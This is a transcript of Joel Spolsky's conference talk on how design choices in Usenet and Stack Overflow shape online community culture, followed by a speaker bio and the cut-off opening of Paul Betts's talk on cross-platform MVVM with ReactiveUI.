Usenet very closely, you'll see how many people actually in the audience, there's a big audience here. Wow. Have any of you, did any of you use Usenet? I mean, it's mostly obsolete but if you're a programmer, you probably use it at some point. So, a large group of you who use it. And one of the things you might have noticed about Usenet is that if you looked closely, the format of a message on Usenet was identical to an email message. It had, you know, a from and a date and so forth up at the top in a subject line. And it was originally a store and forward system that was built, wasn't really built on top of email, but it was sort of built to work in the same way as email did except that you were sending things out to groups and it replaced mailing lists as a good way to ask people questions. One of the things I noticed about Usenet, and I used this extensively in college in the 80s and this was again before the web, was that the form that Usenet conversations tended to take and the culture that evolved on Usenet was directly caused by decisions that were making, that were taken by the programmers that built Usenet. So, one of the decisions that the original Usenet software was called RN and it was sort of half command line software although it could launch you into an editor for typing. And it, the thing about RN is that when you replied to somebody else's message, by default it would copy the entire message that you were replying to into your editor and prepend every line with a little greater than sign. And that made it very easy if you wanted to to reply to the previous person's post on a point by point basis where you inserted your little pithy reply to every single sentence within, you know, sort of interleaved within the body and use that to reply. And this was a design decision that was taken because Usenet had no central server and there was no way to know that the people that are reading your reply had seen the original message. And there was no way for them to get the original message because there was no central server. And if they happened to have stored a copy of it then they knew what they were replying to. But most sites didn't have a lot of disk space and they stored about seven days worth of archives. So, it's very likely that you were replying to somebody and the people reading your reply would not have seen the original message and so you had to quote it. And so this decision to use the greater than signs meant that there was this form of arguing on Usenet that was very, very nitpicky where somebody would go in and insert a comment on every single line and you would say something and they would say, this is nonsense and that's clearly nonsense and this other thing is nonsense and the third thing you said is nonsense and you spelled this wrong and your grammar is terrible and how can anybody with such bad grammar be trusted to rule upon the correct interpretation of the treaty of whatever. And so these debates were completely ridiculous and silly and they were, the culture of debate was shaped by an accidental decision of the software developer that just thought, let's make the default to quote. And what this made me realize is that every time we're building computer software that's going to mediate between human beings that even the smallest decisions that we make in the architecture of those computer systems and user interface design decisions, you could, I mean, you know, by comparison, although Usenet, people would be very argumentative, another system which evolved at the same time was CompuServe. And on CompuServe, it was a central system and you could always find the original message that you were replying to and therefore, because it was stored on the central server, and therefore the reply by default did not copy the previous message and people were much more civilized. They actually did not respond with long screeds that answered every single point and turn. They responded in a far more general way. And I think what I realized then is that every time you design a software that more than one person is going to use, the decisions that you make are going to influence the society that's created on top of that software. And so that's what this talk is really about. The same thing applies in architecture. When you build a wall, it's going to influence where people stand and where they go. If you build something by accident that happens to have a nice curve to it, then kids will show up and start skateboarding there. If you build by mistake a table out of concrete and you put a little 8x8 checkered pattern on the table and some chairs next to it, then old men will show up and start playing chess. So what you build actually causes people to come and start behaving in a certain way. Sometimes it's extraordinarily intentional. It's very, you know, it's exactly what you would have expected and it's exactly what you wanted to happen. Sometimes it's completely accidental. If you've ever been to the Spanish steps in Rome, that's an example where there's sort of an accidental situation where you have two roads, one of which is much higher than the other, and they can't be connected by a road because it's too steep, so they're connected by a staircase. And that staircase is right in the center of town and it overlooks a nice piazza. And so people come and sit on the stairs, mostly backpackers and local Roman high school kids. And it's a fairly convenient place also to braid your friend's hair because you can sit on the step above them. And so all the behavior that's happening on this staircase all the time is an accidental occurrence. You can go there and say, look at this amazing culture that's been established of the backpackers and the high school kids and the people braiding each other's hair. But it's an accident of an architectural feature. In Times Square in New York, they tried to build the staircase, hoping to get the same thing to happen. The staircase doesn't go anywhere. It just goes up into space and then it ends. And they don't have quite as much of the people sitting on the staircase and braiding each other's hair as they do in Rome, but they probably will. When the first discussion forms when the web came out, everybody said, oh, we need a version of Usenet for the web. And the first discussion forms were created online. And these discussion forms were all sort of universally bad copies of Usenet that in most cases paid absolutely no attention whatsoever to the anthropology or the sociology of what was going on on Usenet. So these forums actually copied a lot of the mistakes and copied a lot of the bizarre accidents of the way that Usenet worked. Sometimes they even copied the ability to quote the previous message, although that went away pretty quickly because that was clearly not necessary. But a lot of times they copied the threaded model that Usenet switched to or the original model of just sort of, you always have to see everything. And the main point about this is one of the things that they copied was the fact that things appear in chronological order. And so you're having a discussion and any time you read the discussion, you're always reading it in chronological order. And this makes sense for anything but questions and answers. So we were a little bit more utopian than that in setting out to create stack exchange or stack overflow. We knew that the decisions that we made as architects of the system would create, you know, a physical infrastructure and then people would come live in that physical infrastructure and a culture and a society would develop on that infrastructure. And we had a utopian vision of making this society that meets certain kind of highfalutin goals. The goals that we had were just that people get answers to their questions. It wasn't anything particularly fancy. But we made a lot of design decisions that were based on that which sort of look like, again, anthropology. So let me talk about some of those areas that we focused on a lot in building stack overflow. And in many cases what we were doing was copied from somewhere else. And almost every case it was copied from somewhere else, whether it was Reddit or Dig or Hacker News. Those were some of the more recent ones. Stuff that we copied from Xbox, like achievements, stuff that we copied from the world of gaming. We copied the frequent flyer miles feature of airline loyalty programs. One of the things that we focused a great deal upon is the first impression that you get when you come to stack overflow or any of the 100 odd stack exchange sites that we now have. The impression that you get tells you an awful lot about what's going on. So if I put this photograph up and you look at that, I haven't told you what this is, but many of you will recognize this is the Occupy Wall Street protests. And there's a whole bunch of signals going on there. Now these are protesters, so they are intentionally sending you these signals. And we could find a whole bunch, obviously, somebody holding a sign. And you can read the words on the sign. There's a person there with a sign that says, I love the 99 percent. And that has meaning. She also interestingly has very expensive headphones. But I won't blame her for not thinking about that. There's a fellow there with a t-shirt that says a pada on it. He's got a, you know, it's sort of like a Palestinian keffiye, but it's kind of too brightly colored. So it's kind of, you know, funky and western. And the way his hair is organized and the way everybody is sort of presenting themselves is sending a lot of messages. Everything about this picture is telling you something about what this group of people believes in. And you immediately make a judgment as to whether you agree with that and you want to join or you disagree with that and you don't want to join. And there's all kinds of signals that will tell you whether to join or not. Almost everything you will ever read about web page design is attempting to tell you how to make the web pages friendly as possible to all people so that every human being in the world will want to come to your website. Which sounds like a great ideal, but it is not actually the ideal of Stack Overflow. We focus mostly on how to get people to go away and leave us alone. We looked at, in the early days of, and the reason it has to do with quality, of course. So when we looked at other question and answer systems while building Stack Overflow, we found a bunch that were out there. Here's one, answers.yahoo.com is absolutely enormous. And everybody thought of this as the granddaddy of all question and answer sites. And some of the questions that are on there, I suspect this is probably hard to read in this gigantic room, but I'll read them for you. What do I use to clean out my coffee maker? What is your favorite plant of all time? What are you listening to? What are you listening to? What kind of a question is that? I mean, I guess it is technically a question. There is a question mark there. What was the last thing you ate is on answers.yahoo.com on the home page? Can I die from car carbon monoxide? No. The answer is no. It's fine. Don't worry about it. Just sit there. Some of these questions, there's a clue at the bottom which is I keep forgetting to do my homework question mark. I guess you're required to put a question mark or maybe the system puts it in for you because it looks like the user put an explanation point and somebody added a question mark. I keep forgetting to do my homework. The clue is that these are children. These are kids. They're 12. And they came home from school in the afternoon and they're using their computers to entertain themselves. They are not genuinely asking questions. This is a chat room. It's not actually a Q&A site. And if you saw this and you had an important question about, you know, sort of advanced thermonuclear reactions or whatever, you would not think that this is the right place to ask it and you would leave. So this site is already, anybody that's not a teenager is already going to leave. It's already going to be pushed away by the site because it doesn't really meet their needs. Here's another one. Answers.com was the number 12 site in the world in traffic when we started. And here's some questions that are on there. What kind of attorney is needed for advice on getting someone you know committed to a mental institution? I like that question. It's useful because then you can look them up in the elevators. There was a question here that I thought was telling, what are some examples of a welcome address for JS Prom? Nobody I asked knew what a JS Prom is. This is obviously something that is happening in one particular school. A Prom is a school dance in America. And JS apparently means not JavaScript, but junior senior, which means the two oldest classes, the 16-year-old, 17-year-old, are having a dance at the school. And the interesting thing about this is here is a person who is asking this question who still doesn't realize that the Internet is larger than their high school. But they're on there asking this question. So once again, a site for kids, Askville by Amazon was out there. They weren't that big. There are these questions like how can I start making the right choices in my life? That's a good question. What is the 21st largest states that seems like a ridiculous question? I don't know why anybody would ask. What is the interval notation for 5x minus 4 is less than 3, 2, s? Ah! Finally a real question. And the answer is this looks like homework. We're not going to answer your homework questions. It's the only real question on the site with shutdown immediately. Meanwhile, of course, if you've been to Stack Overflow and you've looked at the home page, you see a whole bunch of programming questions. And if you don't know how to program, you have no idea what is going on and you leave, which again is what we want. SQL indexing, none, single column, multiple columns, all the keywords that you see there, Android, SQL indexing, cake, PHP, interpolation, MATLAB, multigrid, et cetera. You start seeing a whole bunch of words and if you're a programmer, you kind of get that this is a programming site and it might be for you. But if you're not a programmer, you don't even understand what language it's written in. To give you, you're all programmers so you probably think that all this kind of stuff makes sense. But if you look at one of our other sites like the Jewish Life and Learning site, which is very, very specifically for Orthodox Jews asking very specific questions about Orthodox Jewish practice, you see questions like why is the idea of Saphirot, not Shtuf, which you may not understand at all. I think probably very few of you in this room understand what that means or is it possible to have Chomets on the Shabbos directly after Pesach is an important question, but you probably don't know what Chomets or Shabbos or Pesach are. So you might leave, which is fine because you don't have the answer. Here's a statistic site, questions about GG Plot 2 and factor loadings after oblique rotation and so on and so forth. Now to be fair, these sites that I'm showing you, this is our vertical statistic site. This is our vertical Jewish site. Amazon's Askville also had a vertical site for math. And the math questions they had are what is the size of a plot in the Caribbean? I don't know what the size of a plot in the Caribbean is. Let's say 40. I don't know. That's not a question that doesn't even make sense. Okay, so here's my problem. I am 20 years old, didn't really attend high school and know only super basic math, meaning plus. So that's not even a question that we really know how to answer and it's certainly not appealing to a mathematician to answer that question. And then there's something else here which says apply for apartments online. And if you look closely, it was asked 13 hours ago and that sends a message too, right? What is a message? It's spam. Nobody cares. There's nobody here to remove spam. 13 hours have elapsed since somebody posted spam and nobody has done anything about it. The other message, by the way, is that all the avatars are just sort of like little blobs. Nobody has bothered to upload a custom avatar, but that's a little more subtle. Meanwhile, we actually have two math sites, math overflow, which is for research level math and math stack exchange, which is for just general math, not research level. And again, the minute you go to that site, you realize that this is very advanced mathematics and I don't understand any of it. And there's all kinds of formulas, they're in equations and beautiful LaTeX formatting. But I can't make heads and tails out of it. Math overflow is so advanced. I don't know if this is so advanced. But the rule on math overflow is only research level mathematics are welcome, which means it's a commu-, the general rule is if you could ask one of these questions to a math professor at a university and they could answer it, then it's not research. And therefore, it doesn't belong on math overflow. And that's sort of their guidance. And that sort of shows you they're only asking questions that math professors can't answer. This is a pretty sophisticated site for a pretty narrow range of, you know, in that case, about 12,000 people that participate on something of a regular basis. And everything about the homepage sends you that signal, so you would not ask a question about, you know, how to subtract on those sites. So you see a group of people, you see a website, and it's going to have all kinds of little signals going on. And you're going to decide, you know, here's a group of kids and it's winter and they're wearing shorts, which means that this is an East Coast university and they're from California because they're still wearing shorts. And they're wearing these little caps that indicate that they're probably in a frat and they're playing Ultimate Frisbee. And there's a whole bunch of signals there and they're obviously athletes, not stud-, not studious, you know, they're jocks, not geeks. And as soon as you see that group of people doing that thing, you immediately decide, that looks fun, I want to join them. Or I don't even know what they're doing, I'm not going to join them. And everything about the homepage is designed, again, to push away the wrong people that can't answer questions for us and that are going to have questions that are going to interfere with sort of the professional stuff that's going on on Stack Overflow. So first impressions is the first thing I talked about. The second thing I want to talk about is voting, of course, and you're a programmer so I can go through this pretty quickly. Voting, you could vote on questions. They, there's a little up arrow and a down arrow. When you like a question, you vote it up. When you don't like it, you vote it down. The most interesting thing there is actually voting on answers and that is a fairly, fairly reliable way to make sure that the good answers appear first in the, in the, in the list instead of last. And that difference alone made a huge difference to sort of the quality of a page that Stack Overflow shows you. Because every other forum was showing you the historical archive of a discussion that took place, which you could read and that would take you a certain amount of time and the answer might be towards the end. It might be buried in the middle. It might not be anywhere and you had no way of judging other than careful reading and then trying everything. Which of those answers was likely to solve your problem? But by sorting things, by vote, by community peer, it's, it's very, very likely that the first answer or maybe the second but most likely the first answer is the actual solution to the problem. And so if you find a Stack Overflow question as a result of a Google search, which is over 90% of the people are doing that, then over 90% of the page views are results of Google searches, then the, the first thing you read is likely to be the answer. So you're likely to be happy that you got your answer right away. Instead of having to read a seven-page discussion and click next and try all the things that the different people recommended and see if they work for you, you can skip that, that whole stage. One of the more valuable parts of the voting is that it leads to reputation. And every society has some kind of reputation system. The, you know, the military always has this thing that we call fruit salad that you wear, you know, all these colorful little ribbons to indicate, it's Colin Powell. A complete history, those are called campaign ribbons. So it's a history of things that you've done. And everything else is our sort of badges that you've earned. But these are things that you've done, you know, battles that you've been in and so forth. And of course we have the same thing on Stack Overflow. So here's our user page. And each user, mostly when we show you their, their name, we'll put it next to an avatar that they choose and then sort of a few more things like their reputation and so forth. So when you start out, it's very simple. You get a little tag there, a little slug. It has nothing other than your name on it and a one which indicates that you were able to successfully type your name. You get one free reputation point just to, just so you don't feel like you should recreate your account, I guess. And then you have a little picture which you control and if you haven't learned yet how to change your avatar, then we give you a bunch of little triangles which make you look like a newbie. Over time though, it starts to get a little bit better. You might get a little bit of reputation. You figure out how to upload a new picture of yourself that reflects you and you start to earn these little badges which appear next to your name. Over time, when you get a lot of badges, this is something not a lot of people have noticed, but I think 10,000, you get a little drop shadow that appears beneath your avatar and if somebody mouses over, you get this much larger card which appears which you control where you can put a description of yourself and so forth. You know, some of our top users have an awful lot of reputation. There's John Skeet, still our number one user. And the only thing that you can sort of go beyond just having a lot of reputation on the system is you can run an election to become a moderator. And when you're a moderator, you get that little diamond next to your name which means that there was an election and everybody voted and you won and you became one of the moderators on the site which gives you the ability to sort of remove things without anybody questioning what you're doing to see things that have been removed and to try to help the community run itself by itself. So all of this stuff, all of this flair is stuff that you wear if it's your clothing when you're on Stack Exchange. And it sends a message as to who you are and what you care about and what you like and why people should pay attention to you and whether or not they should pay attention to you. And it's going to, even if it has no effect on the people that are seeing it, it has an effect on you because you're always thinking about what is the message that I'm portraying, that I'm conveying, that I'm sending people. And it's something that sort of everybody thinks about just in the way they get dressed every morning and what they put on and how they wear it. And I picked this picture of a person because he's got about 30 things going on there in which he's trying to portray something about himself to everybody that sees him. When he wakes up in the morning, he thinks about how he's wearing that little hat that, flag, if you don't recognize it, is the Confederate States of the United States. They tried to break off in the Civil War because they wanted to keep slaves and they were defeated in the Civil War but he still got the flag. And it's on a particular kind of truck or hat. He's got a particular kind of haircut. He's got all kinds of tattoos which I won't even begin to start to interpret the tattoos. Can't see them all that well. Anyway, he's got a cute little flip phone. He's got the Harley Davidson motorcycle bike belt buckle. And that shirt that he's wearing is what we call in American a wife beater. And not only is he wearing a wife beater t-shirt but he has an emergency backup wife beater t-shirt in case something happens to the first one. Stuck in his belt. So again, it's just he's sending 27 signals as to who he is and what he wants you to think about him and how he wants to present himself. And that's something that everybody does and you can be a peasant or a king and you still get to think about what you wear, how you present to the world. And that's what reputation is. We have badges as well which is sort of a part of your reputation on Stack Overflow. And one thing that people don't recognize about badges is that people sort of look at them and say, well, I don't really care about badges. I'm just answering questions and I'll earn those accidentally. And most people actually don't. But just knowing that the badges are there is enough to send signals to the community, to the world of people on Stack Overflow as to what behaviors we want you to do. So for example, when Jeff Atwood and I designed Stack Overflow, we said, should you be allowed to answer your own question? And we thought about this and we said, well, there's pros and cons. If you can answer your own question, then your stealing reputation from other people that might have come along later and answered it and gotten their reputation sort of seems unfair for you to ask a question and then immediately answer it and get reputation. On the other hand, we realized that the person most likely to be able to solve a problem is the person who asked it because once they ask the question, you know, they don't give up or go to sleep or take a nap. They actually go back to their compiler and continue to try to solve that problem. And so they're very likely to discover the answer and if they do, we want to encourage them to post it for everybody else to see. And indeed, the goal of Stack Overflow is to make answers for those hundreds of people that are coming into each question from Google searches to read. It's not necessarily to solve the problem of the original asker. And so we decided that we definitely want to allow you to answer your own question. In fact, we want to encourage it. And so there's a badge that you can earn for answering your own question. And that is enough to send a message to the entire community even if nobody works hard to try to earn that badge. And some people do. But even if they don't, we've told the entire community, look, this is a site that values, this community values you when you answer your own question. Plus about another hundred odd things that we can show you through the badge system that we consider to be important. All these things, these badges, these reputation, they are a part of your permanent record and they feed into the fact that you can get a job on Stack Overflow and that we have this career system in the background where you can sort of advertise what you know and what you're good at. And thousands of employers will have access to that and be able to come along and find you based on your skills. Government is something that every society has. Every society of two or more people has some system of governance. We built some of the government system into Stack Overflow from the beginning. The most important thing that we built in is the reputation system is we realized that as people gain more experience with Stack Overflow, as they spend more time using Stack Overflow, they'll earn more reputation and they can be trusted to make more and more decisions within the system. So they can be trusted more and more to indicate to us what should be closed, what kind of questions should be closed, to vote things up, to vote things down. As you earn reputation, we realize that you're spending more time on our site and we could show you less advertising because you've already seen that same ad 50 times. We can show it to you fewer. And in fact, almost all of the daily community moderation is sort of done by people that have just earned enough moderation to do it, earned enough reputation to do that moderation. We have another site which a lot of people don't know about called Metastack Overflow. It's the site about Stack Overflow and that's where conversations take place about what's going on on the site. Why was this question closed? Should we allow questions like this? Should we have a feature that does so and so? This is sort of the equivalent of the parliament or the Congress of Stack Overflow or maybe it's sort of like a town hall where conversations take place. And we have a chat system which almost nobody has found yet, but it's there. Keep digging. You'll find it. There's a link. And this is 24-7 online sort of IRC style chat where sort of more immediate decisions are taken. There's one room, one chat room that we give all the moderators access to. There are about 300 moderators on Stack Exchange and they have access to a room called Teacher's Lounge. And Teacher's Lounge is almost like real-time police radio where literally in real-time people are responding to the needs of the community. We have a blog which is sort of like a newspaper and all of these things are sort of parts of our culture, parts of our society. The blog is where we sort of announce things, big news, big changes, et cetera. We'll show up on the blog. And all of that society, all of those governmental institutions, whether it's the real-time ones like Teacher's Lounge or mostly the ones like Metta, the chat and a very limited number of internal conversations that we have, lead to law, creating a system of law. And every successful society eventually has a bunch of laws. Our primary overruling law is We Hate Fun. This is the symbol of the logo of We Hate Fun as a clown throwing up. And essentially, we take ourselves way too seriously. When we first created Stack Overflow, we detected that people were every once in a while asking something that was funny or somebody would write a response that was very funny. And the thing that would happen is somebody would write something funny and everybody would look at it and they would vote it out because it was funny. And that was already interfering, immediately interfering with this system that we tried to build, which is a system that gets you the correct answer to your question. And then these things that were funny and that got upvotes would attract eyeballs from all over the place. So they get posted to Reddit and Hacker News and Slash. If you go back far enough in time. And millions of eyeballs would land on these things. And we could tell because we would see these pages that instead of having 200 page views or 500 page views, would have 50,000 page views. Now a normal website developer would say, yay, I win because they're getting all the page views. But these pages were completely useless. They were bad answers. And if you were searching for a particular question or searching to solve a programming problem, which is what we built our site for, then these pages would get in your way. Thus, our rule about hating fun and the way that we show that we hate fun is that we close questions all the time. And we close questions that for various reasons, possibly because they're fun, but more likely just because they just don't fit on our site for various reasons. And we have about five of them. And those are sort of the laws. That's kind of how we enforce things. We have, when we close things, by the way, we don't immediately delete them. If we just deleted them, then you wouldn't know we closed them. And you might continue to practice that bad behavior. So what we do is we sort of close them and we leave them around on the homepage for a while with the word closed next to it and a big banner over it saying, this question is bad. The person who asked it is evil and should be, doesn't really say that. But we leave that out sort of as a signal to everybody else, don't do this. This is not what we do here. Please stop doing this. Somebody did this. And we had to close their question. And then we're not allowing anybody to answer it because you did this thing. The five things that we did that we have as closed reasons that are constantly evolving, constantly changing, and sort of with, as we learn from the community, we change what those things are that we close and why we close them. One of the reasons, these are the current reasons, but they're in the process of being changed. One of them is a duplicate. We used to refer to this as a duplicate question. Now we don't really think of it so much as this is a duplicate question. We think of it as this question has already been answered, just slightly different by about 5%. If somebody tells you, if you ask a question and somebody tells you, somebody already asked that question, then you say, good. Well, that's probably because this is a good question. It's like, what's wrong with that? If you ask a question and we tell you, oh, by the way, somebody already answered that question, then you say, oh, terrific. I'll just go read that answer. I can undo my asking over here. So duplicates, the reason we close duplicates instead of letting you ask them all over the time is again and again and again is that we are in some ways a wiki because our answers are editable. And we would rather have one amazing answer to each question rather than having that a lot of people edit and maintain and modify and keep up to date rather than having a bunch of people answering the questions again and again and again, especially for common things like what is a monad? We have a reason for closing questions called off topic. Obviously people will come in and ask things that are completely unrelated to the topic of programming. This one was a toilet issue. This is not strictly a programming problem. I have a lady employee who is joining from tomorrow and I want to convey her a message that the bathroom facilities at the office are out of order. How do I tell her to relieve herself before arriving in the morning? So that's not really a programming question. And we just closed it. And it was obviously fortunately that I see here that was only viewed 48 times. So it didn't cause a lot of damage. Wow. Out of the 48 people that viewed that, 22 people voted it down. That's pretty bad. We have something that we call not constructive. The word not constructive itself is not constructive in the sense that nobody understands what it means or why we're closing your question is not constructive. What it really means is that we have discovered that questions that are highly opinion-based don't work well on Stack Overflow because they tend to generate, if it's highly opinion-based, it tends to generate conversation on both sides of the issue that doesn't really go anywhere and it sort of inquite and it doesn't teach anybody anything. It's just like how many debate points can you think of to say that VI is better than Emax or Cabs are better than Spaces or Web Forms are better to use than NBC Developer. And some of these things actually do have a lot of pros and cons. There are a lot of reasons to use Cabs and a lot of reasons to use Spaces. But the actual debate of that issue is something that generates a page on the Internet that first of all already exists in a million forms and secondly is a complete waste of time. And it's amusing for the participants but it doesn't create an artifact that's going to be useful for things going on later. So anything that's highly opinionated or highly based on subjective criteria we tend to close on Stack Overflow. We also have a thing called Not a Real Question. That's a little bizarre. This question was need ideas about mobile apps which have never been created before. So it's like, okay, for whatever reason we've just decided that this is sort of not a real thing. Now this particular closed reason is insulting saying, hey, that's not a real question. Like, yes it is. It has a question mark. And a lot of times it's not a real question because you bungled the explanation of your question. And we're going to change sort of the wording of this. This is really off topic. It's really just not a programming question. It's not within the scope of the kind of questions that the site was built for that we want to ask. We have something called too localized. Again, a confusing term because, but this is I'm missing a bracket somewhere. Here's my code. Where's the missing bracket? Unlikely to help anybody else. You know, one of the key observations of Stack Overflow is that every, for every question, it's asked by one person. It's answered by on average two people. Sometimes four, sometimes one. That's a lot more than that. But, you know, a few people answer it. But it is viewed by hundreds. Usually people coming in from Google who have landed there. And so we actually feel like the real community that we're trying to serve, the number one community we're trying to serve with Stack Overflow is the 99% of people who land on a question because they were searching for a problem. Not because they typed the question themselves or the even smaller group of people that typed answers who we love. But the people that we really want to serve are the 20 million people a month who land on our site because of the search engine query because they're having this problem and we already have the answer for them. And so when somebody asks a question that is unlikely to ever help anybody else, it's sort of a bad thing to be stuffing in Google search results because anybody that ever goes to this page is going to be sad for the rest of all time. And so the principle of two localized says, you know what? Your question is bad because it's selfish and it's unlikely to help anybody else. And that doesn't mean that you can't ask it. It just means that we're going to look at it kind of askew. And what's interesting about these two localized questions is that in almost every case, they can be cured in about 10 seconds and made much more applicable. So instead of asking, where is the bracket that I'm missing? Where is my close friend that I somehow forgot somewhere? You should ask, I have a bunch of code that looks like this, five lines of sample code. What is the best way to find a missing bracket? What debugging technique would you recommend so that I may find a missing bracket? And now you've taken something which is your personal problem and you've made it globally applicable to a large range of people and now all of a sudden it belongs on Stack Overflow. So two localized is sort of what we do as a society to punish people that are being selfish. Or asking a question that nobody's ever going to be able to answer because, you know, it only applies for a vanishingly small amount of time. So in conclusion, you know, Stack Overflow is like a big city. Stack Exchange is like a giant city. Stack Overflow, when it has about 20 million people visiting a month, that's the population of Seoul, South Korea, one of the biggest cities in the world. It's like a big city. And if you imagine Seoul, South Korea, you imagine everybody speaks the same language mostly. Some of them are fluent, some of them are new. Some of them are babies, some of them are children, some of them are new speakers, some of them are just learning the language. But mostly there's just one language and yet there are a lot of, there's a lot of mainstream culture, there's a lot of subcultures, but there are 20 million unique stories of the 20 million individuals that live there and that's where it really, really gets interesting. And so the techniques that you would think of to try to study a city are the same techniques that we use to study and to build and to design the Stack Exchange network. Again, the old days, computers were just a computational device and I think I sort of challenge you as you go through the next couple of days when you're in a session and somebody is giving you an example of object-oriented design in C-Sharp. And you think about sort of what are those design decisions that you're making merely to do a calculation or a computation. And then think about the fact that if you're building modern software, it's very likely that you're creating software for culture, for a culture and for humanity and for a large group of people and that your software and your C++ classes at some point possibly going to mediate between human beings and at the point that it mediates between human beings, it creates culture, creates society and you have to think about it like an anthropologist essentially. Thank you very much. Thank you.
|
Joel Spolsky is an expert on software development, co–founder of Fog Creek Software, and the co–creator of stackoverflow.com. His website Joel on Software is popular with software developers around the world and has been translated into over thirty languages. He has written four books about software development, including Smart and Gets Things Done: Joel Spolsky's Concise Guide to Finding the Best Technical Talent (Apress 2007). Joel has worked at Microsoft, where he designed VBA as a member of the Excel team, and at Juno Online Services, developing an Internet client used by millions.
|
10.5446/51486 (DOI)
|
Great. So this is not about domain-driven design CQRS. So this was originally talked by Ashik Mahjtab's, but he couldn't make it. So I'm subbing in and I'm talking about something completely different. So if you were interested in DDD, then you should find a different talk. But if you were interested in making user interfaces on places that aren't traditional Microsoft platforms, then you should stick around. It'll be interesting. You know, just stick around always. Like it'll be fine. I promise it'll be interesting, or at least entertaining. I can't promise it'll be interesting. It's fine. You know, I'd have to read people's brains. It'd be weird and awkward. Just like this introduction. So this is MBVM without XAML. So alternate title is a login dialog, is a login dialog, is a login dialog. Alternate title, how to write the same code and have it run everywhere. So Apple, Android, Windows Phone, WinRT, Metro, Windows Store, Modern, whatever Microsoft calls it these days. I can't even keep track. So who am I? My name is Paul Betts. I'm giving a talk on GitHub tomorrow on pull requests on, and that's what I originally came here for. But I'm giving this other talk as well, and I'm really excited about it because I really like this talk. I think it's super interesting. So I work at GitHub. I work on GitHub for Windows, which is a desktop application that makes it easy to use Git, especially with GitHub. But you can actually use it with Codeplex and Bitbucket and anywhere you want. It's just a Git client. So let me get back to the topic of this presentation. As you can see, these three dialogues look very different. So on the left, there's like Android, old.sad, and in the middle we have an iPhone, login dialog. On the right, we have this Windows 8 login dialog. So they look pretty different. They're set up different, they're arranged differently, but the thing is they mostly act the same. So even though those login dialogues look different, they share a lot of things that are really similar. You'll find a lot of dialogues or a lot of pages in an application will act pretty similar even though they're on different platforms. So let me give you a few examples. So the user can't click login until the username password is filled out. You need to do login with the credentials and pop an error if it doesn't, they don't work. If you don't show the user that we're trying to go over the network and look up the login information, they think that something wrong happened, they start pounding on buttons. So you have to show the working span. Once it succeeds, we have to go to a different page. That page is probably the opening page of the application. So these things are true in everywhere, in all these different platforms. And so we should be able to share that code everywhere. It would be really cool. But right now we can't. Right now it's really frustrating to try to share code directly on between these different platforms. So when I say sharing code everywhere, this is not what I mean. So Swing is the Java toolkit. If you use the clips, this is what Swing looks like. GTK and Qt are both cross-platform UI toolkits. It's a way to write the same UI and have them show up everywhere. That's useful, but I think that it's not, if you want to make great, especially mobile applications, this is an early good approach in my opinion. You end up having these applications that don't feel native. And so we don't want to do that. We want to have native applications that feel like they're on their platform. But at the same time, I don't want to write every application three or four times. So how can we solve this? We can solve this via a pattern called MVVM. So MVVM is super popular in the Microsoft world. And in the Cocoa and Android world, people are starting to realize why it could be useful. So how many people have heard of MVVM? Probably a lot of people. Is it.NET conference? How many people can correctly describe what a view model is? Don't answer that because I'll get like 50 different, you know. It's a very confusing term. I think the best way that people describe it is it is really a model of a view, right? And there are a few important things why we should even bother with this pattern or why it's interesting. So I like to summarize it this way. We use MVVM because UI frameworks are intestable because they're written by Apple and Windows and they live in the late 90s, so they don't care about unit tests. That's a joke. You can laugh. You're allowed. I'm just poking a little fun. So the important thing is that view models separate mechanism from policy. And what do I mean by that? So view models describe what can happen, right? So I have two different kind of things. I have properties like first name, last name on my view model, right? And those can be set and read, right? And I also have commands, right? Commands are like copy, paste, open, right? And so when we separate mechanism from policy, what we're trying to do is make it so that it doesn't matter how this command was invoked, it just matters that the command was invoked. So if I have an open command, it might be in a toolbar button and in a menu. I don't care. When I write applications in a traditional way, I've permanently tied how a command is invoked to what actually happens when you invoke it, right? When I write like menu.onclick goes to blah and I write some code, I've tied the invocation of this command or the actual stuff it does to a UI toolkit element, which is really problematic because I can't test UI tool kit components easily, right? So if I try to create a WPF window in a unit test runner, I won't have a dispatcher, all kinds of things will go weird. Trying to simulate typing into a text box is kind of weird. I'm not really, that's not what I'm interested in testing, right? I'm only interested in testing when I change this thing what happens, right? So testability is really important in this case. A lot of people, especially when I introduced this to my friends in the Mac team, they said, you can't test that code. This is untestable code. They actually originally said we don't have any code to test. I was like, but you've got all this code. It's a huge application. They're like, well, it's all UI code. You can't test that. You can if you do the separation, which is really interesting. So the cool thing is we can actually create most of the interesting parts of our application without actually seeing the user interface, right? And then when we wire it up, we want the code in the view to be really, really super boring, right? Because I can't test anything in the view. So I'm going to make that code really mechanical and super boring so that when I look at it, it's obviously going to be right because there's nothing interesting in it, right? So that's the idea. We're going to move all the interesting code into a class we can test because view models are just regular classes. And then move the code as little code as possible in the view where we can't test it. So we're doing MVVM right if we can write a UI without actually seeing a UI, right? Which is really cool. So if view models don't know about views, then why can't we use them everywhere? Like there's a piece missing if I want to take my, if I want to take my, you know, WinRT view model and then run it on Android. Does anyone know that piece? What about bindings? Right? So a huge part of MVVM is being able to tie the view and the view model together through these XAML bindings, right? And so most people in here have used MVVM, have used XAML bindings, right? Like, has anyone not used XAML bindings? No one, not know what I'm talking about? No? Cool. So we have a solution to this problem. Actually we have several solutions to the problem. I see Stuart Lodge in the audience. He also solved this and done a great job. It's very cool. So ReactVUI. So everyone and their brother has written an MVVM framework, myself included. And so mine is a little interesting because it includes this library called the reactive extensions. And so the reactive extensions, I'm going to try to explain an hours with the content in two minutes. So imagine if, you know, we have a list, right? We have like one, two, three, four, five and we can run select and where and aggregate and select many on it and then get a more interesting list, right? And so if you look at an event like key up, we have some, you know, and somebody types in the keyboard, you select H-E-L-L-O. It's like, well, that was kind of a list, too, right? Like it was some stuff in a particular order, right? And so if I can on a list, a boring list and take selects and where and aggregate and select many and turn it into an interesting list that I care about, why can't I do take boring events like mouse up and mouse down and turn them into interesting events like the user dropped a file on the right hand corner, right? So reactive extensions takes all the things you know about lists and applies them to events. And you find out that events are everywhere, but we always talk with them, refer to them in different, with different language like a callback is an event that only happens once, right? But it doesn't, it isn't treated like an event, you pass it, you know, like a callback method, right? Or like, you know, geolocation is an event, right? Like we're getting location information about where we are, but we don't treat it like an event because it has different syntax, right? So being able to combine those and talk with the same language with them and be able to use these really functional programming concepts on them is really interesting. So anyway, so you don't need to know that. The point is that Reactive UI has its own binding framework, completely rewritten, it doesn't use the ambly bindings at all. So here's an example. So we're going to take the view model and we're going to take the username property and bind it to a text box on the view, right? And so because by default, when I say bind, it's a two-way bind, right? So if I type in the text box, it ends up in the view model. If I set the view model, it ends up in the text box. So that's pretty interesting. Let's take it a little, a 